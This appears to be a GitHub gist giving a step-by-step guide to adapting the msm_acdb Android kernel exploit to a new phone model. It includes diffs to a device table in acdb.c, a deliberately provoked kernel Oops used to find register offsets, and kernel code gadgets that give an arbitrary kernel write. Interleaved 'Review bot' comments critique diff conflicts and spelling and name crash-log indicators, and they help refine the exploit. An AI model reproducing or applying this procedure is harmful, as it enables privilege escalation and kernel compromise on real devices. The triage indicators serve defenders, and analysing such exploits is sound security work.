@fi01
Created July 28, 2013 04:42
Revisions

  1. fi01 created this gist Jul 28, 2013.
    98 changes: 98 additions & 0 deletions How to use msm_acdb explot
    @@ -0,0 +1,98 @@
    To use msm_acdb explot we need to work 4 steps.
    1. Find how to run command with root or system previlege
    2. Get offset for registers to setup
    3. Choose proper code in kernel image
    4. Setup parameters in acdb.c


    1. Find how to run command with root or system previlege
    Do it your self. :-P


    2. Get offset for registers to setup
    - Add dummy entry to get crach log.

    --- a/acdb.c
    +++ b/acdb.c
    @@ -43,6 +43,7 @@ static supported_device supported_devices[] = {
    { DEVICE_SH04E_01_00_02, { 0x7c, 0x88, { 0x8c, 0xc02498e0 }, { 0xac, 0xc000dd1c } } },
    { DEVICE_SH04E_01_00_03, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } },
    { DEVICE_SH04E_01_00_04, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } },
    + { DEVICE_SH05E_01_00_05, { 0, 0, { 0, 0}, { 0, 0} } },
    { DEVICE_SO04D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc0326a38 }, { 0xbc, 0xc0526964 } } },
    { DEVICE_SO05D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc03265d8 }, { 0xbc, 0xc0524d84 } } },
    { DEVICE_SOL21_9_1_D_0_395, { 0x7c, 0x88, { 0x8c, 0xc0244778 }, { 0xac, 0xc000dd24 } } },
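Review bot: the dummy `DEVICE_SH05E_01_00_05` entry is all zeros on purpose, so on the new device the tool's buffer is never filled with real addresses and the ioctl return path comes back with every restored register equal to its own buffer offset; that is exactly what the Oops further down shows (`r4 : 0000007c` ... `pc : [<0000009c>]`, `LR is at acdb_ioctl+0x740/0x860`), and the `ACDB=> ACDB ioctl not found!` line immediately before it is the marker a triager should expect in `/proc/last_kmsg` after such a reboot. Style: `{ 0, 0}` drops the space before the closing brace that every other entry in the table has; write `{ 0, 0 }`.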

    - Build tool

    - Stop services to avoid lost data

    - Run tool with root or system previlege
    It will be reboot due to cause kernel panic.

    - See crash log
    (e.g. /proc/last_kmsg or log partition)
    <3>[ 348.770486] ACDB=> ACDB ioctl not found!
    <1>[ 348.770547] Unable to handle kernel NULL pointer dereference at virtual address 0000009c
    <1>[ 348.770608] pgd = df18c000
    <1>[ 348.770639] [0000009c] *pgd=9b727831, *pte=00000000, *ppte=00000000
    <0>[ 348.770700] Internal error: Oops: 80000007 [#1] PREEMPT SMP
    <4>[ 348.770761] Modules linked in:
    <4>[ 348.770791] CPU: 0 Not tainted (3.0.8 #1)
    <4>[ 348.770853] PC is at 0x9c
    <4>[ 348.770883] LR is at acdb_ioctl+0x740/0x860
    <4>[ 348.770944] pc : [<0000009c>] lr : [<c0137658>] psr: 60000013
    <4>[ 348.770944] sp : ce513f28 ip : 00000000 fp : 00000098
    <4>[ 348.771005] r10: 00000094 r9 : 00000090 r8 : 0000008c
    <4>[ 348.771066] r7 : 00000088 r6 : 00000084 r5 : 00000080 r4 : 0000007c
    <4>[ 348.771097] r3 : 00000000 r2 : ce513e74 r1 : c0973db8 r0 : 00000000
    <4>[ 348.771158] Flags: nZCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user

    You'll found offset for register in buffer.
    R4 : 0x7c
    R5 : 0x80
    R6 : 0x84
    R7 : 0x88
    R8 : 0x8c
    R9 : 0x90
    R10: 0x94
    R11: 0x98
    PC : 0x9c

    - Disassemble do_vfs_ioctl and check return code
    c021d8fc: e2 8d d0 44 ADD SP, SP, #$44
    c021d900: e8 bd 83 f0 LDMUW [SP], { R4-R9, PC }

    You'll found add 0x44 bytes to SP and restore register R4-R9 and PC.

    3. Choose proper code in kernel image
    - Choose code to write value and to end do_vfs_ioctl code from kernel image
    They should use same size on stack and restore same registers with do_vfs_ioctl like this:

    write code: use R9 as write address and R5 as write value, and use 0x20 bytes
    c0381b98: e5 89 50 00 STR R5, [R9]
    c0381b9c: e8 bd 87 f0 LDMUW [SP], { R4-R10, PC }

    end do_vfs_ioctl code: use 0x24 bytes (=0x44 - 0x20) and restore R4-R9 and PC
    c0231b98: e2 8d d0 24 ADD SP, SP, #$24
    c0231b9c: e8 bd 83 f0 LDMUW [SP], { R4-R9, PC }

    4. Setup parameters in acdb.c
    - Setup parameters in acdb.c
    Write value is R5, offset = 0x80
    Write address is R9, offset = 0x90
    Write code is offset 0x9c and address = 0xc0381b98
    End do_vfs_ioctl code is offset 0xbc (=0x9c + 0x20) and address = 0xc0231b98

    --- a/acdb.c
    +++ b/acdb.c
    @@ -43,6 +43,7 @@ static supported_device supported_devices[] = {
    { DEVICE_SH04E_01_00_02, { 0x7c, 0x88, { 0x8c, 0xc02498e0 }, { 0xac, 0xc000dd1c } } },
    { DEVICE_SH04E_01_00_03, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } },
    { DEVICE_SH04E_01_00_04, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } },
    + { DEVICE_SH05E_01_00_05, { 0x80, 0x90, { 0x9c, 0xc0381b98 }, { 0xbc, 0xc0231b98} } },
    { DEVICE_SO04D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc0326a38 }, { 0xbc, 0xc0526964 } } },
    { DEVICE_SO05D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc03265d8 }, { 0xbc, 0xc0524d84 } } },
    { DEVICE_SOL21_9_1_D_0_395, { 0x7c, 0x88, { 0x8c, 0xc0244778 }, { 0xac, 0xc000dd24 } } },
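Review bot: this hunk and the one in step 2 are both written against the same base (`@@ -43,6 +43,7 @@`, each adding one line between `DEVICE_SH04E_01_00_04` and `DEVICE_SO04D_7_0_D_1_137`), so applied in sequence they conflict instead of stacking; either show the second as a modification of the dummy line, i.e. `- { DEVICE_SH05E_01_00_05, { 0, 0, { 0, 0}, { 0, 0} } },` followed by the `+` line, or state in step 4 that the step 2 entry is replaced. `0xc0231b98}` is also missing the space before `}` that the other entries use. Note that nothing in the table ties an entry to a kernel build beyond the device name: a firmware update that moves `do_vfs_ioctl` or the two code addresses still matches the name and produces the panic from step 2, which is why a hard-coded table like this is brittle against even minor kernel rebuilds.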

    That's all. Have fun!!
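Review bot: the file name and body spell the words as `explot`, `previlege` and `crach`; fix these to `exploit`, `privilege` and `crash`, and change `You'll found` to `You'll find` (twice), before this document is shared further. On substance, step 2 shows that a wrong table entry does not fail safely: the ioctl handler lets a caller-supplied buffer decide which values land in R4-R9 and PC on the way out of `do_vfs_ioctl`, so a mismatched entry ends in the kernel Oops shown rather than an error return. That is the strongest argument this document makes for getting the acdb ioctl handler fixed on affected firmware, and until it is, the `ACDB=> ACDB ioctl not found!` line followed by an Oops with `LR is at acdb_ioctl` in `/proc/last_kmsg` is the indicator to look for when triaging unexplained reboots on these devices.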